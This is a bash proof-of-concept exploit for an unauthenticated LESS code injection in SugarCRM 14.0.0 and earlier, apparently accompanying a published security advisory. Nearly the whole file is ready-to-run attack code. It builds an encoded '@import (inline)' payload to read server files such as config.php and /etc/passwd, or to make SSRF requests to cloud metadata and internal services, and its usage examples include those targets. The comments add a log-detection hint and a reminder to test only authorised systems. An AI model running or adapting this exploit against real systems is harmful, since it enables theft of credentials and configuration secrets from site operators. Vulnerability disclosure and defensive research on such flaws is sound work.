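#!/bin/bash
#
# ------------------------------------------------------------------
# SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Vulnerability
# ------------------------------------------------------------------
#
# author..............: Egidio Romano aka EgiX
# mail................: n0b0d13s[at]gmail[dot]com
# software link.......: https://www.sugarcrm.com
#
# +-------------------------------------------------------------------------+
# | This proof of concept code was written for educational purpose only.    |
# | Use it at your own risk. Author will be not responsible for any damage. |
# +-------------------------------------------------------------------------+
#
# [-] Original Advisory:
#
# https://karmainsecurity.com/KIS-2025-04
#
# What this script does (only what the code below shows):
#   - Sends one GET to <base>/rest/v10/css/preview with a query parameter
#     whose value ends up, unescaped, inside LESS source that the server
#     compiles and returns as CSS.
#   - The value closes the current LESS statement ("1;") and appends two
#     `@import (inline) '...'` statements: the first inlines the
#     attacker-chosen path or URL (local file read when a path is given,
#     SSRF when a URL is given), the second inlines a data: URI carrying a
#     fixed sentinel so the script can tell where the imported content
#     ends in the compiled CSS.
#   - No session / OAuth token is sent, so the endpoint must be reachable
#     without authentication for this to succeed.
#
# Caveats for whoever runs this:
#   - `$2` is placed inside single quotes in the LESS payload; a path or
#     URL containing a single quote breaks the injection.
#   - If the imported content itself contains the sentinel string, the
#     printed output is truncated at that point.
#   - curl runs with -k (TLS verification disabled) so lab targets with
#     self-signed certificates work; do not copy that habit into anything
#     that handles real credentials.
#   - Only run this against systems you are authorised to test.
#
# Detection hint (derived from the request shape below): the attempt shows
# up in web-server / proxy logs as a GET to /rest/v10/css/preview whose
# query string contains a percent-encoded "@import (inline)"
# (%40import%20%28inline%29).

set -u

# Sentinel appended after the inlined content; chosen by the original
# author, has no regex metacharacters, so it is safe in sed/grep patterns.
readonly SENTINEL='________'

#######################################
# Print the tool banner to stdout.
#######################################
banner() {
  echo
  echo "+----------------------------------------------------------------------+"
  echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |"
  echo "+----------------------------------------------------------------------+"
}

#######################################
# Print usage and examples to stdout.
# The placeholders after $0 were lost in the published listing (angle
# brackets stripped); they are restored here as plain descriptive names.
#######################################
usage() {
  cat <<EOF

Usage.....: $0 <base_url> <file_path_or_url>

Example...: $0 'http://localhost/sugarcrm/' 'config.php'
Example...: $0 'http://localhost/sugarcrm/' '/etc/passwd'
Example...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'
Example...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'

EOF
}

#######################################
# Percent-encode every byte of $1 (reserved and unreserved alike).
# Encoding everything is harmless for the server and avoids special-casing.
# Arguments: $1 - raw string
# Outputs:   encoded string on stdout, no trailing newline
# Note: od -An -v -tx1 is POSIX; the original used xxd -p, which ships with
#       vim and is not installed everywhere. Hex case is irrelevant to URL
#       decoding.
#######################################
urlencode() {
  printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../%&/g'
}

#######################################
# Entry point.
# Arguments: $1 - base URL of the SugarCRM instance (trailing slash optional)
#            $2 - local file path or URL to inline via LESS @import
# Exit codes: 1 on bad usage / missing tool, 2 when the sentinel is not
#             found in the response (exploit failed), 0 on success.
#######################################
main() {
  banner

  if [[ $# -ne 2 ]]; then
    usage
    exit 1
  fi

  # Fail early with a clear message instead of a confusing pipeline error.
  local tool
  for tool in curl od sed tr; do
    if ! command -v "$tool" >/dev/null 2>&1; then
      printf '\nError: required tool "%s" not found in PATH\n\n' "$tool" >&2
      exit 1
    fi
  done

  # Tolerate a base URL given without the trailing slash.
  local base="${1%/}/"
  local target="$2"

  # "1;" terminates the LESS value the server assigns our parameter to;
  # "//" comments out whatever the server appends after it.
  local payload="1; @import (inline) '${target}'; @import (inline) 'data:text/plain,${SENTINEL}';//"
  local injection
  injection=$(urlencode "$payload")

  # "param" is the name of the query parameter (and LESS variable) the
  # payload is injected through. The published listing rendered this as
  # "¶m=", i.e. "&param=" mangled through an HTML "&para" entity; it is
  # restored here. If the request does not behave as expected, confirm the
  # parameter name against the original advisory.
  # -k: skip TLS verification (lab targets); -s: no progress meter.
  local response
  response=$(curl -ks "${base}rest/v10/css/preview?baseUrl=1&param=${injection}")

  if grep -qF -- "$SENTINEL" <<<"$response"; then
    printf "\nOutput for '%s':\n\n" "$target"
    # Everything before the line holding the sentinel is the inlined
    # content; quit at the sentinel line and drop it from the output.
    sed "/${SENTINEL}/q" <<<"$response" | grep -vF -- "$SENTINEL"
    echo
  else
    printf '\nError: exploit failed!\n\n' >&2
    exit 2
  fi
}

main "$@"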